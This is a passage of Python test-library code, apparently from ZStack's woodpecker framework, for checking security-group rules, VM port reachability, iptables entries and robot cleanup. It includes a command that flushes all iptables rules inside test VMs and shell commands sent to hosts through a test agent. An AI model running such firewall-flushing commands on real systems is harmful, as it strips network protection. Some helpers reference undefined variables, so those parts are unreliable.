sg_nics = res_ops.query_resource(res_ops.VM_SECURITY_GROUP, conditions)
if not sg_nics:
return False
sg_invs = []
for sg_nic in sg_nics:
sg_uuid = sg_nic.securityGroupUuid
conditions = res_ops.gen_query_conditions('uuid', '=', sg_uuid)
sg = res_ops.query_resource(res_ops.SECURITY_GROUP, conditions)[0]
sg_invs.append(sg)
return sg_invs
def lib_is_sg_rule_exist(nic_uuid, protocol=None, target_ip=None, direction=None, port=None):
sg_invs = lib_get_sg_invs_by_nic_uuid(nic_uuid)
if sg_invs:
return lib_is_sg_rule_exist_in_sg_invs(sg_invs, protocol=protocol, target_ip=target_ip, direction=direction, port=port)
def lib_is_sg_rule_exist_in_sg_invs(sg_invs, protocol=None, target_ip=None, direction=None, port=None):
if not sg_invs:
return False
for sg in sg_invs:
if not sg.rules:
continue
if not protocol and not target_ip and not direction and not port:
return True
if lib_has_rule_in_sg(sg, protocol, target_ip, direction, port):
return True
return False
#assume vm is behind vr. vr image was assume to have required commands, e.g. nc, telnet, ssh etc. We will use nc to open vm's port.
#will check and open all ports for vm
def lib_open_vm_listen_ports(vm, ports, l3_uuid=None):
if not l3_uuid:
target_ip = vm.vmNics[0].ip
else:
for nic in vm.vmNics:
if nic.l3NetworkUuid == l3_uuid:
target_ip = nic.ip
break
else:
test_util.test_fail("Can not find [vm:] %s IP for [l3 uuid:] %s. Can not open ports for it." % (vm.uuid, l3_uuid))
lib_check_nc_exist(vm, l3_uuid)
flush_iptables_cmd = 'iptables -F; iptables -F -t nat'
test_util.test_logger("Flush iptables rules")
test_result = lib_execute_command_in_vm(vm, flush_iptables_cmd)
target_ports = ' '.join(str(port) for port in ports)
port_checking_cmd = 'result=""; for port in `echo %s`; do echo "hello" | nc -w1 %s $port >/dev/null 2>&1; if [ $? -eq 0 ]; then result="${result}0";else result="${result}1"; (nohup nc -k -l %s $port >/dev/null 2>&1 </dev/null &); fi ; done; echo $result' % (target_ports, target_ip, target_ip)
test_util.test_logger("Doing opening vm port operations, might need 1 min")
test_result = lib_execute_command_in_vm(vm, port_checking_cmd)
if not test_result:
test_util.test_fail("check [vm:] %s ports failure. Please check the failure information. " % vm.uuid)
test_result = test_result.strip()
if len(ports) != len(test_result):
test_util.test_fail("open/check vm ports failure. Expected to get %s results, but get %s results: %s." % (len(ports), len(test_result), test_result))
test_util.test_logger("Has open all [ports:] %s for [vm:] %s [ip:] %s" % (ports, vm.uuid, target_ip))
def lib_check_nc_exist(vm, l3_uuid=None):
if not l3_uuid:
target_ip = vm.vmNics[0].ip
else:
for nic in vm.vmNics:
if nic.l3NetworkUuid == l3_uuid:
target_ip = nic.ip
break
else:
test_util.test_fail("Can not find [vm:] %s IP for [l3 uuid:] %s. Can not open ports for it." % (vm.uuid, l3_uuid))
nc_checking_cmd = "which nc"
test_result = lib_execute_command_in_vm(vm, nc_checking_cmd)
if not test_result:
test_util.test_fail('Test [vm:] %s does not have command "nc" for testing. [error:]' % vm.uuid)
#assume vm is behind vr. vr image was assume to have required commands, e.g. nc, telnet, ssh etc. We will use nc to open vm's port.
def lib_open_vm_listen_port(vm, port, l3_uuid=None):
if not l3_uuid:
target_ip = vm.vmNics[0].ip
else:
for nic in vm.vmNics:
if nic.l3NetworkUuid == l3_uuid:
target_ip = nic.ip
break
else:
test_util.test_fail("Can not find [vm:] %s IP for [l3 uuid:] %s. Can not open ports for it." % (vm.uuid, l3_uuid))
lib_check_nc_exist(vm, l3_uuid)
open_port_cmd = 'nohup nc -k -l %s %s >/dev/null 2>&1 </dev/null &' % (guest_ip, port)
test_result = lib_execute_command_in_vm(vm, open_port_cmd)
if not test_result:
test_util.test_fail('cannot execute test ssh [command:] %s in test vm: %s. ' % (open_port_cmd, vm.uuid))
test_util.test_logger('has open [port:] %s on [vm:] %s [ip:] %s' % (port, vm.uuid, guest_ip))
return True
def lib_check_vm_port(src_vm, dst_vm, port):
'''
lib_check_vm_port could use either vr or native host to check dst_vm's port connection from src_vm.
vr image or native host was assume to install commands, e.g. nc, telnet, ssh etc.
'''
print "connect %s : %s from %s" % (dst_vm.uuid, port, src_vm.uuid)
vr_vm = lib_find_vr_by_vm(src_vm)
target_ip = dst_vm.vmNics[0].ip
#telnet might wait 1 mins time out.
cmd = 'echo "quit" | telnet %s %s|grep "Escape character"' % (target_ip, port)
#cmd = 'echo "hello"|nc -w 1 %s %s' % (target_ip, port)
ret = True
if vr_vm[0].uuid == src_vm.uuid:
try:
src_vm_ip = lib_find_vr_mgmt_ip(src_vm)
lib_install_testagent_to_vr_with_vr_vm(src_vm)
vr_vm = src_vm
except:
test_util.test_logger("[vm:] %s is not a VR or behind any VR. Can't connect to it to test [vm:] %s [port:] %s" % (src_vm.uuid, dst_vm.uuid, port))
return False
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = cmd
rspstr = http.json_dump_post(testagent.build_http_path(src_vm_ip, host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
rsp = jsonobject.loads(rspstr)
if rsp.return_code != 0:
ret = False
test_util.test_logger('shell error info: %s' % rsp.stderr)
else:
vr_vm = vr_vm[0]
if TestHarness == TestHarnessHost:
test_harness_ip = lib_find_host_by_vm(src_vm).managementIp
#assign host l2 bridge ip.
lib_set_vm_host_l2_ip(src_vm)
else:
test_harness_ip = lib_find_vr_mgmt_ip(vr_vm)
lib_install_testagent_to_vr_with_vr_vm(vr_vm)
src_vm_ip = src_vm.vmNics[0].ip
username = lib_get_vr_image_username(vr_vm)
password = lib_get_vr_image_password(vr_vm)
rsp = lib_ssh_vm_cmd_by_agent(test_harness_ip, src_vm_ip, username, \
password, cmd)
if not rsp.success:
ret = False
if ret:
test_util.test_logger('Successfully connect [vm:] %s [ip:] %s [port:] %s from [vm:] %s' % (dst_vm.uuid, target_ip, port, src_vm_ip))
return True
else:
test_util.test_logger('Fail to connect [vm:] %s [ip:] %s [port:] %s from [vm:] %s' % (dst_vm, target_ip, port, src_vm_ip))
return False
def lib_check_vm_ports_in_a_command(src_vm, dst_vm, allowed_ports, denied_ports):
'''
Check VM a group of ports connectibility within 1 ssh command.
1 means connection refused. 0 means connection success.
'''
common_l3 = lib_find_vms_same_l3_uuid([src_vm, dst_vm])
target_ip = lib_get_vm_nic_by_l3(dst_vm, common_l3).ip
src_ip = lib_get_vm_nic_by_l3(src_vm, common_l3).ip
test_util.test_logger("[target vm:] %s [ip:] %s" % (dst_vm.uuid, target_ip))
lib_check_ports_in_a_command(src_vm, src_ip, target_ip, allowed_ports, denied_ports, dst_vm, common_l3)
def lib_check_ports_in_a_command(src_vm, src_ip, target_ip, allowed_ports, \
denied_ports, dst_vm, l3_uuid=None):
'''
Check target_ip ports connectibility from src_ip.
If the allowed_ports are not connectable, or the denied ports are
connectable, it will raise execption.
'''
all_ports = allowed_ports + denied_ports
target_ports = ' '.join(str(port) for port in (allowed_ports + denied_ports))
expected_result = ''.join(str(0) for item in allowed_ports) + '' + ''.join(str(1) for item in denied_ports)
#Tihs is old script to do serial port checking.
#port_checking_cmd = 'result=""; for port in `echo %s`; do echo "hello" | nc -w1 %s $port >/dev/null 2>&1; if [ $? -ne 0 ]; then result="${result}1";else result="${result}0"; fi ; done; echo $result' % (target_ports, target_ip)
#The script is optimized to be executed in 2 seconds. We found sometime
# nc will return more than 1 second, although we set -w1
#{ echo "hello" | nc -w1 %s $1 ; \
#{ echo "hello" | nc -w1 %s $1 >/dev/null 2>&1 ; \
port_checking_cmd = '\
check_port()\
{ echo "hello" | nc -w1 %s $1 >/dev/null 2>&1 ; \
echo $? > /tmp/port_$1; \
} ; \
result=""; \
for port in `echo %s`; \
do rm -f /tmp/port_$port; \
(check_port $port &); \
done; \
sleep 2; \
for port in `echo %s`; \
do if [ -f /tmp/port_$port ]; \
then result=$result`cat /tmp/port_$port`; \
else result="${result}2"; \
fi; \
done; \
echo $result > /tmp/result_`date +%%s`; \
echo $result' \
% (target_ip, target_ports, target_ports)
test_util.test_logger("Doing port checking, might need 1 min or longer.")
test_result = lib_execute_command_in_vm(src_vm, port_checking_cmd, l3_uuid)
if not test_result:
test_util.test_fail("check [ip:] %s ports failure. Please check the failure information. " % target_ip)
test_result = test_result.strip()
if len(expected_result) != len(test_result):
test_util.test_fail("check vm ports failure. Expected to get %s results: %s, but get %s results: %s. The checking ports are: %s" % (len(expected_result), expected_result, len(test_result), test_result, target_ports))
else:
test_util.test_logger("Expected to get results: %s, and get results: %s.The checking ports are: %s" % (expected_result, test_result, target_ports))
for i in range(len(expected_result)):
if expected_result[i] == test_result[i]:
if expected_result[i] == '0':
test_util.test_logger('(Expected result:) Successfully connect [vm:] %s [ip:] %s [port:] %s from [vm:] %s [ip:] %s' % (dst_vm.uuid, target_ip, all_ports[i], src_vm.uuid, src_ip))
else:
test_util.test_logger('(Expected result:) Fail to connect [vm:] %s [ip:] %s [port:] %s from [vm:] %s [ip:] %s' % (dst_vm.uuid, target_ip, all_ports[i], src_vm.uuid, src_ip))
else:
src_vm_nic_id = 'vnic%s.x-out' % lib_get_vm_internal_id(src_vm)
dst_vm_nic_id = 'vnic%s.x-in' % lib_get_vm_internal_id(dst_vm)
if expected_result[i] == '0':
test_util.test_fail("(network port checking error:) [vm:] %s [ip:] %s \
[port:] %s [vnic id:] %s is not connectable from [vm:] %s [ip:] %s [vnic id:] \
%s. Expected: connection success." \
% (dst_vm.uuid, target_ip, all_ports[i], dst_vm_nic_id, \
src_vm.uuid, src_ip, src_vm_nic_id))
else:
test_util.test_fail("(nework port checking checking error:) [vm:] %s [ip:] %s [port:] %s [vnic id:] %s is connectable from [vm:] %s [ip:] %s [vnic id:] %s. Expected: connection failed." % (dst_vm.uuid, target_ip, all_ports[i], dst_vm_nic_id, src_vm.uuid, src_ip, src_vm_nic_id))
def lib_check_vm_ports(src_vm, dst_vm, allowed_ports, denied_ports):
test_util.test_logger("Following ports should be allowed to access from [vm] %s to [vm] %s : %s" % (src_vm.uuid, dst_vm.uuid, allowed_ports))
test_util.test_logger("Following ports should be denied to access from [vm] %s to [vm] %s : %s" % (src_vm.uuid, dst_vm.uuid, denied_ports))
#Do all operations in 1 commands
lib_check_vm_ports_in_a_command(src_vm, dst_vm, allowed_ports, denied_ports)
return True
#Check port one by one, will trigger a lot of ssh connection.
for port in allowed_ports:
if not lib_check_vm_port(src_vm, dst_vm, port):
test_util.test_fail("Network port checking error: [vm:] %s [port:] %s is not connectable from [vm:] %s ." % (dst_vm.uuid, port, src_vm.uuid))
for port in denied_ports:
if lib_check_vm_port(src_vm, dst_vm, port):
test_util.test_fail("Network port checking error: [vm:] %s [port:] %s is connectable from [vm:] %s ." % (dst_vm.uuid, port, src_vm.uuid))
def lib_check_src_vm_group_ports(src_vms, dst_vm, allowed_ports, denied_ports):
for src_vm in src_vms:
lib_check_vm_ports(src_vm, dst_vm, allowed_ports, denied_ports)
if len(src_vms) > 1:
for nsrc_vm in src_vms:
for src_vm in src_vms:
if nsrc_vm != src_vm:
lib_check_vm_ports(nsrc_vm, src_vm, allowed_ports, denied_ports)
def lib_check_dst_vm_group_ports(src_vm, dst_vms, allowed_ports, denied_ports):
for dst_vm in dst_vms:
lib_check_vm_ports(src_vms, dst_vm, allowed_ports, denied_ports)
if len(dst_vms) > 1:
for nsrc_vm in dst_vms:
for dst_vm in dst_vms:
if nsrc_vm != dst_vm:
lib_check_vm_ports(nsrc_vm, dst_vm, allowed_ports, denied_ports)
def lib_check_vm_group_ports(src_vms, dst_vms, allowed_ports, denied_ports):
if isinstance(src_vms, list):
for src_vm in src_vms:
lib_check_vm_ports(src_vm, dst_vms, allowed_ports, denied_ports)
if len(src_vms) > 1:
for nsrc_vm in src_vms:
for src_vm in src_vms:
if nsrc_vm != src_vm:
lib_check_vm_ports(nsrc_vm, src_vm, allowed_ports, denied_ports)
if isinstance(dst_vms, list):
for dst_vm in dst_vms:
lib_check_vm_ports(src_vms, dst_vm, allowed_ports, denied_ports)
if len(dst_vms) > 1:
for nsrc_vm in dst_vms:
for dst_vm in dst_vms:
if nsrc_vm != dst_vm:
lib_check_vm_ports(nsrc_vm, dst_vm, allowed_ports, denied_ports)
def lib_get_sg_rule_by_uuid(rule_uuid, session_uuid=None):
conditions = res_ops.gen_query_conditions('uuid', '=', rule_uuid)
sg_rules = res_ops.query_resource(res_ops.SECURITY_GROUP_RULE, conditions)
if sg_rules:
return sg_rules[0]
def lib_get_sg_rule(sg_uuid, rule=None, session_uuid=None):
'''
get Security group rule by sg_uuid and rule object. The rule object is like
rule inventory.
'''
conditions = res_ops.gen_query_conditions('uuid', '=', sg_uuid)
sg = res_ops.query_resource(res_ops.SECURITY_GROUP, conditions)[0]
sg_rules = sg.rules
if rule == None:
return sg_rules
for sg_rule in sg_rules:
if sg_rule.type == rule.type and sg_rule.protocol == rule.protocol and sg_rule.allowedCidr == rule.allowedCidr and sg_rule.startPort == rule.startPort and sg_rule.endPort == rule.endPort:
return sg_rule
def lib_get_sg_direction_rules(sg_uuid, direction, session_uuid=None):
sg = res_ops.get_resource(res_ops.SECURITY_GROUP, session_uuid, uuid=sg_uuid)[0]
rules = []
for sg_rule in sg.rules:
if sg_rule.type == direction:
rules.append(sg_rule)
return rules
def lib_gen_sg_rule(port, protocol, type, addr):
'''
will return a rule object by giving parameters
port: rule key, like Port.rule1_ports
'''
startPort, endPort = Port.get_start_end_ports(port)
rule = inventory.SecurityGroupRuleAO()
rule.allowedCidr = '%s/32' % addr
rule.endPort = endPort
rule.startPort = startPort
rule.protocol = protocol
rule.type = type
return rule
def lib_get_sg_rule_uuid_by_rule_obj(sg_uuid, rules, session_uuid=None):
sg = res_ops.get_resource(res_ops.SECURITY_GROUP, session_uuid, uuid=sg_uuid)[0]
target_rules = []
sg_rules = sg.rules
for rule in rules:
for sg_rule in sg_rules:
if sg_rule.type == rule.type and sg_rule.protocol == rule.protocol and sg_rule.allowedCidr == rule.allowedCidr and sg_rule.startPort == rule.startPort and sg_rule.endPort == rule.endPort:
target_rules.append(sg_rule.uuid)
test_util.test_logger('find sg [rule:] %s' % sg_rule.uuid)
break
if len(target_rules) != len(rules):
test_util.test_logger('Require to delete %s rules, but find %s rules in database ' % (len(rules), len(target_rules)))
return target_rules
def lib_delete_rule_from_sg(sg_uuid, rules, session_uuid=None):
target_rules = lib_get_sg_rule_uuid_by_rule_obj(sg_uuid, rules, session_uuid)
if target_rules:
lib_remove_sg_rules(target_rules)
def lib_check_vm_pf_rule_exist_in_iptables(pf_rule):
'''
Check if vm pf rule is set in vm's VR.
@params:
pf_rule: the pf inventory
'''
test_util.test_logger('Begin to test [Port Forwarding:] %s ' % pf_rule.uuid)
vr = lib_find_vr_by_vm_nic(lib_get_nic_by_uuid(pf_rule.vmNicUuid))
check_string1 = pf_rule.allowedCidr
if pf_rule.protocolType == inventory.TCP:
check_string2 = '-p tcp'
else:
check_string2 = '-p udp'
if vr.applianceVmType == 'vrouter':
check_string3 = '--dports %s:%s' % (pf_rule.vipPortStart, pf_rule.vipPortEnd)
check_cmd = "sudo iptables-save| grep -Fe '%s'|grep -Fe '%s'|grep -Fe '%s'" % (check_string1, check_string2, check_string3)
else:
check_string3 = '--dport %s:%s' % (pf_rule.vipPortStart, pf_rule.vipPortEnd)
check_cmd = "iptables-save| grep -Fe '%s'|grep -Fe '%s'|grep -Fe '%s'" % (check_string1, check_string2, check_string3)
lib_install_testagent_to_vr_with_vr_vm(vr)
vr_ip = lib_find_vr_mgmt_ip(vr)
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = check_cmd
rspstr = http.json_dump_post(testagent.build_http_path(vr_ip, \
host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
rsp = jsonobject.loads(rspstr)
if rsp.return_code == 0:
test_util.test_logger('shell cmd result: %s' % rsp.stdout)
test_util.test_logger('Find [port forwarding:] %s rule on [vr:] %s iptables' % (pf_rule.uuid, vr.uuid))
return True
else:
test_util.test_logger('shell error info: %s' % rsp.stderr)
test_util.test_logger('Can not find [port forwarding:] %s rule on [vr:] %s iptables' % (pf_rule.uuid, vr.uuid))
return False
def lib_check_vm_sg_rule_exist_in_iptables(vm, rule_type=None, \
special_string=None, additional_string=None):
'''
rule_type = 'ingress' or 'egress'
If special_string is not None, test will only grep special_string for
vm sg rule and skip all other params including additional_string.
If special_string is None and additional_string is not None.
test will grep additional string, besides of common vm and rule_type
'''
if rule_type == inventory.INGRESS:
rule = 'in'
elif rule_type == inventory.EGRESS:
rule = 'out'
else:
rule = ''
if not special_string:
if additional_string:
cmd = "nic_id=`virsh dumpxml %s|grep internalId|awk -F'>' '{print $2}'|awk -F'<' '{print $1}'`; iptables-save |grep vnic${nic_id}.0-%s |grep -Fe '%s'" % (vm.uuid, rule, additional_string)
else:
cmd = "nic_id=`virsh dumpxml %s|grep internalId|awk -F'>' '{print $2}'|awk -F'<' '{print $1}'`; iptables-save |grep vnic${nic_id}.0-%s" % (vm.uuid, rule)
else:
cmd = "iptables-save |grep -Fe '%s'" % special_string
host_ip = lib_find_host_by_vm(vm).managementIp
shell_cmd = host_plugin.HostShellCmd()
shell_cmd.command = cmd
rspstr = http.json_dump_post(testagent.build_http_path(host_ip, host_plugin.HOST_SHELL_CMD_PATH), shell_cmd)
rsp = jsonobject.loads(rspstr)
if rsp.return_code == 0:
test_util.test_logger('shell cmd result: %s' % rsp.stdout)
test_util.test_logger('Find [vm:] %s related security rules on [host:] %s iptables' % (vm.uuid, host_ip))
return True
else:
test_util.test_logger('shell error info: %s' % rsp.stderr)
#test_util.test_logger('shell command: %s' % rsp.command)
test_util.test_logger('Can not find [vm:] %s related security rules on [host:] %s iptables' % (vm.uuid, host_ip))
return False
def lib_execute_random_sg_rule_operation(test_dict, target_vm, cre_vm_opt):
sg_vm = test_dict.get_sg_vm()
target_vm_nics = target_vm.vm.vmNics
sg_action, target_sg, target_nic, target_rule_uuid = SgRule.generate_random_sg_action(sg_vm, target_vm_nics)
test_util.test_logger('Select [SG Operataion:] %s, [sg uuid:] %s, [target_vm:] %s, [target nic:] %s, [target_rule]: %s .' % (sg_action, target_sg.security_group.uuid, target_vm.vm.uuid, target_nic.uuid, target_rule_uuid))
if sg_action == SgRule.add_rule_to_sg:
target_l3_uuid = target_nic.l3NetworkUuid
sg_stub_vm = sg_vm.get_stub_vm(target_l3_uuid)
#create test stub vm, if it is not exist. Why create test_vm here?
#1, we need to make sure there is SG test, then create test vm.
#2, when creating sg rule, it need to bind with an target IP
# address. So the target IP address is test VM's ip address.
# Since the IP address is meanless to set with different L3's
# test vm, so it need to have a test vm when add a SG Rule.
if not sg_stub_vm:
#sg testing need to set cre_vm_opt.
create_sg_vm_option = test_util.VmOption()
create_sg_vm_option.set_name('sg_test_vm')
create_sg_vm_option.set_l3_uuids([target_l3_uuid])
create_sg_vm_option.set_image_uuid(cre_vm_opt.get_image_uuid())
create_sg_vm_option.set_instance_offering_uuid(cre_vm_opt.get_instance_offering_uuid())
create_sg_vm_option.set_instance_offering_uuid(cre_vm_opt.get_instance_offering_uuid())
sg_stub_vm = lib_create_vm(create_sg_vm_option)
try:
sg_stub_vm.check()
except:
test_util.test_logger("Create Test Stub [VM:] %s (for SG testing) fail, as it's network checking failure. Has to quit." % sg_stub_vm.vm.uuid)
traceback.print_exc(file=sys.stdout)
test_util.test_fail("Create SG test stub vm fail.")
test_util.test_logger("Create Test [VM:] %s (for SG testing) successfully." % sg_stub_vm.vm.uuid)
sg_vm.add_stub_vm(target_l3_uuid, sg_stub_vm)
sg_stub_vm_l3_vmnic = lib_get_vm_nic_by_l3(sg_stub_vm.vm, target_l3_uuid)
sg_stub_vm_ip = sg_stub_vm_l3_vmnic.ip
#Generate a random SG rule
sg_target_rule = SgRule.generate_sg_rule(sg_stub_vm_ip)
#ZStack will not allow adding duplicated SR Rule. Might remove checking, if it is harmless.
if not lib_get_sg_rule(target_sg.security_group.uuid, sg_target_rule):
test_util.test_dsc(\
'Robot Action: %s; on SG: %s' % \
(sg_action, target_sg.get_security_group().uuid))
rules = target_sg.add_rule([sg_target_rule])
rules_uuid = []
for rule in rules:
rules_uuid.append(rule.uuid)
test_util.test_dsc(\
'Robot Action Result: %s; new Rule: %s; on SG: %s' % \
(sg_action, rules_uuid, target_sg.get_security_group().uuid))
else:
test_util.test_logger(\
"skip add rule to sg: %s, since there is already one" \
% target_sg.security_group.uuid)
test_util.test_dsc('Robot Action: %s is skipped' % sg_action)
elif sg_action == SgRule.remove_rule_from_sg:
test_util.test_dsc(\
'Robot Action: %s; on SG: %s; on Rule: %s' % \
(sg_action, target_sg.get_security_group().uuid, \
target_rule_uuid))
target_sg.delete_rule_by_uuids([target_rule_uuid])
elif sg_action == SgRule.add_sg_to_vm:
test_util.test_dsc(\
'Robot Action: %s; on SG: %s; on VM: %s; on Nic: %s' % \
(sg_action, target_sg.get_security_group().uuid, \
target_vm.get_vm().uuid, target_nic.uuid))
sg_vm.attach(target_sg, [(target_nic.uuid, target_vm)])
elif sg_action == SgRule.remove_sg_from_vm:
test_util.test_dsc(\
'Robot Action: %s; on SG: %s; on VM: %s; on Nic: %s' % \
(sg_action, target_sg.get_security_group().uuid, \
target_vm.get_vm().uuid, target_nic.uuid))
sg_vm.detach(target_sg, target_nic.uuid)
#VIP Library
def lib_get_vm_eip_list(vm_uuid, session_uuid=None):
'''
if vm was attached with any eip, it will return the eip list.
If not, it will return empty list [].
'''
vm_inv = lib_get_vm_by_uuid(vm_uuid, session_uuid)
vmNics = vm_inv.vmNics
if not vmNics:
return []
vmNics_uuid = []
for nic in vmNics:
vmNics_uuid.append(nic.uuid)
cond = res_ops.gen_query_conditions('vmNicUuid', 'in', \
','.join(vmNics_uuid))
result = res_ops.query_resource(res_ops.EIP, cond, session_uuid)
return result
def lib_get_vm_pf_list(vm_uuid, session_uuid=None):
'''
if vm was attached with any portForwarding, it will return the pf list.
If not, it will return empty list [].
'''
vm_inv = lib_get_vm_by_uuid(vm_uuid, session_uuid)
vmNics = vm_inv.vmNics
if not vmNics:
return []
vmNics_uuid = ''
for nic in vmNics:
vmNics_uuid.append(nic.uuid)
cond = res_ops.gen_query_conditions('vmNicUuid', 'in', \
','.join(vmNics_uuid))
result = res_ops.query_resource(res_ops.PORT_FORWARDING, cond, session_uuid)
return result
def lib_create_vip_obj(vm=None, name='vip', l3_uuid=None, session_uuid=None):
'''
vm should be a VM behind of a VR. The VIP will be get from VR's public IP.
If vm=None, will pick up any VR public L3 network
@return: vip_test_obj
'''
if not l3_uuid:
if vm:
vrs = lib_find_vr_by_vm(vm)
for vr in vrs:
nic = lib_find_vr_pub_nic(vr)
if nic:
l3_uuid = nic.l3NetworkUuid
break
if not l3_uuid:
vr_offering = deploy_config.instanceOfferings.virtualRouterOffering
if isinstance(vr_offering, list):
l3_name = vr_offering[0].publicL3NetworkRef.text_
else:
l3_name = vr_offering.publicL3NetworkRef.text_
condition = res_ops.gen_query_conditions('name', '=', l3_name)
l3s = res_ops.query_resource(res_ops.L3_NETWORK, condition)
if l3s:
l3_uuid = l3s[0].uuid
if l3_uuid:
import zstackwoodpecker.zstack_test.zstack_test_vip as zstack_vip_header
vip = zstack_vip_header.ZstackTestVip()
vip_option = test_util.VipOption()
vip_option.set_name(name)
vip_option.set_l3_uuid(l3_uuid)
vip.set_creation_option(vip_option)
vip.create()
return vip
def lib_delete_vip(vip_uuid):
net_ops.delete_vip(vip_uuid)
def lib_get_vip_by_uuid(vip_uuid):
conditions = res_ops.gen_query_conditions('uuid', '=', vip_uuid)
vip = res_ops.query_resource(res_ops.VIP, conditions)
return vip[0]
def lib_get_eip_by_uuid(eip_uuid):
conditions = res_ops.gen_query_conditions('uuid', '=', eip_uuid)
eip = res_ops.query_resource(res_ops.EIP, conditions)
return eip[0]
#----------- Robot Library -------------
def lib_robot_cleanup(test_dict):
for vm in test_dict.get_vm_list(vm_header.RUNNING):
vm.clean()
test_dict.mv_volumes(vm.vm.uuid, test_stage.free_volume)
for vm in test_dict.get_vm_list(vm_header.STOPPED):
vm.clean()
test_dict.mv_volumes(vm.vm.uuid, test_stage.free_volume)
for vm in test_dict.get_vm_list(vm_header.DESTROYED):
vm.clean()
for vl in test_dict.get_volume_list():
vl.clean()
for img in test_dict.get_image_list():
img.clean()
for img in test_dict.get_image_list(test_stage.deleted_image):
img.clean()
sg_vm = test_dict.get_sg_vm()
for vm in sg_vm.get_all_stub_vm():
if vm:
vm.clean()
for sg in sg_vm.get_all_sgs():
sg_vm.delete_sg(sg)
#Depricated
#for sg_uuid in test_dict.get_sg_list():
# lib_delete_security_group(sg_uuid)
for vip in test_dict.get_all_vip_list():
vip.delete()
for sp in test_dict.get_all_available_snapshots():
sp.delete()
for vm in test_dict.get_all_utility_vm():
vm.clean()
for account in test_dict.get_all_accounts():
account.delete()
for instance_offering in test_dict.get_all_instance_offerings():
vm_ops.delete_instance_offering(instance_offering.uuid)
for disk_offering in test_dict.get_all_disk_offerings():
vol_ops.delete_disk_offering(disk_offering.uuid)
def lib_error_cleanup(test_dict):
test_util.test_logger('- - - Error cleanup: running VM - - -')
for vm in test_dict.get_vm_list(vm_header.RUNNING):
try:
vm.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: stopped VM - - -')
for vm in test_dict.get_vm_list(vm_header.STOPPED):
try:
vm.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: destroyed VM - - -')
for vm in test_dict.get_vm_list(vm_header.DESTROYED):
try:
vm.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: volume - - -')
for vl in test_dict.get_all_volume_list():
try:
vl.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: image - - -')
for img in test_dict.get_image_list():
try:
img.clean()
except:
pass
for img in test_dict.get_image_list(test_stage.deleted_image):
try:
img.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: SG stub_vm - - -')
sg_vm = test_dict.get_sg_vm()
for vm in sg_vm.get_all_stub_vm():
if vm:
try:
vm.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: SG - - -')
for sg in sg_vm.get_all_sgs():
try:
sg_vm.delete_sg(sg)
except:
pass
for sg_uuid in test_dict.get_sg_list():
try:
lib_delete_security_group(sg_uuid)
except:
pass
test_util.test_logger('- - - Error cleanup: Vip/Eip/Pf - - -')
for vip in test_dict.get_all_vip_list():
try:
vip.delete()
except:
pass
test_util.test_logger('- - - Error cleanup: snapshots - - -')
for sp in test_dict.get_all_available_snapshots():
try:
sp.delete()
except:
pass
test_util.test_logger('- - - Error cleanup: utiltiy vm - - -')
for vm in test_dict.get_all_utility_vm():
try:
vm.clean()
except:
pass
test_util.test_logger('- - - Error cleanup: accounts - - -')
for account in test_dict.get_all_accounts():
try:
account.delete()
except:
pass
test_util.test_logger('- - - Error cleanup: instance offerings- - -')
for instance_offering in test_dict.get_all_instance_offerings():
try:
vm_ops.delete_instance_offering(instance_offering.uuid)
except:
pass
test_util.test_logger('- - - Error cleanup: disk offerings- - -')
for disk_offering in test_dict.get_all_disk_offerings():
try:
vol_ops.delete_disk_offering(disk_offering.uuid)
except:
pass
def lib_robot_status_check(test_dict):
print 'target checking test dict: %s' % test_dict
test_util.test_logger('- - - check running VMs status - - -')
for vm in test_dict.get_vm_list(vm_header.RUNNING):
vm.check()
test_util.test_logger('- - - check stopped vm status - - -')
for vm in test_dict.get_vm_list(vm_header.STOPPED):
vm.check()
test_util.test_logger('- - - check volume status - - -')
for volume in test_dict.get_all_volume_list():
volume.check()
test_util.test_logger('- - - check image status - - -')
for image in test_dict.get_image_list():
image.check()
test_util.test_logger('- - - check SG rules - - -')
sg_vm = test_dict.get_sg_vm()
sg_vm.check()
test_util.test_logger('- - - check vip eip/pf - - -')
for vip in test_dict.get_all_vip_list():
if vip:
vip.check()
test_util.test_logger('- - - check Snapshot - - -')
volume_snapshots = test_dict.get_all_available_snapshots()
for snapshots in volume_snapshots:
snapshots.check()
test_util.test_logger("- - - Robot check pass - - -" )
def lib_vm_random_operation(robot_test_obj):
'''
Random operations for robot testing
'''
test_dict = robot_test_obj.get_test_dict()
print 'target test dict for random operation: %s' % test_dict
excluded_actions_list = robot_test_obj.get_exclusive_actions_list()
cre_vm_opt = robot_test_obj.get_vm_creation_option()
priority_actions = robot_test_obj.get_priority_actions()
random_type = robot_test_obj.get_random_type()
public_l3 = robot_test_obj.get_public_l3()
test_stage_obj = test_stage()
target_vm = None
attached_volume = None
ready_volume = None
snapshot_volume = None
target_snapshot = None
#Firstly, choose a target VM state for operation. E.g. Running.
if test_dict.get_vm_list(vm_header.STOPPED):
if test_dict.get_vm_list(vm_header.DESTROYED):
target_vm_state = random.choice([vm_header.RUNNING, \
vm_header.STOPPED, vm_header.DESTROYED])
else:
target_vm_state = random.choice([vm_header.RUNNING, \
vm_header.STOPPED])
else:
if test_dict.get_vm_list(vm_header.DESTROYED):
target_vm_state = random.choice([vm_header.RUNNING, \
vm_header.DESTROYED])
else:
target_vm_state = vm_header.RUNNING
#Secondly, choose a target VM from target status.
target_vm_list = test_dict.get_vm_list(target_vm_state)
if target_vm_list:
target_vm = random.choice(target_vm_list)
vm = lib_get_vm_by_uuid(target_vm.get_vm().uuid)
#vm state in db
vm_current_state = vm.state
if target_vm_state != vm_current_state:
test_util.test_fail('\
[vm:] %s current [state:] %s is not aligned with random test record [state:] \
%s .' % (target_vm.get_vm().uuid, vm_current_state, target_vm_state))
test_stage_obj.set_vm_state(vm_current_state)
test_util.test_logger('target vm is : %s' % target_vm.get_vm().uuid)
test_util.test_logger('target test obj: %s' % test_dict)
host_inv = lib_find_host_by_vm(vm)
if host_inv:
bs = lib_get_backup_storage_list_by_vm(vm)[0]
if lib_check_live_snapshot_cap(host_inv) and bs.type == inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE:
